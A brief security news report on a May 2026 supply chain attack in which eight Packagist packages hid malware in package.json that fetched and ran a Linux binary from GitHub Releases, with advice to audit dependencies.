Packagist Supply Chain Attack Infects 8 Packages Using GitHub-Hosted Linux Malware
A coordinated supply chain attack campaign has impacted eight packages on Packagist, the main repository for PHP Composer packages. According to security firm Socket, the malicious code was not added to composer.json as expected, but instead inserted into package.json, targeting projects that ship JavaScript alongside PHP. The malware downloads and executes a Linux binary hosted on a GitHub Releases URL. The attack was discovered on May 23, 2026, and the affected packages have since been removed or updated. This incident underscores the growing sophistication of supply chain attacks, where attackers exploit cross-platform dependencies to evade detection. Developers are advised to audit their package.json files for unexpected entries and verify the integrity of dependencies.
PHP developers must now check package.json for malicious code, expanding the attack surface beyond composer.json.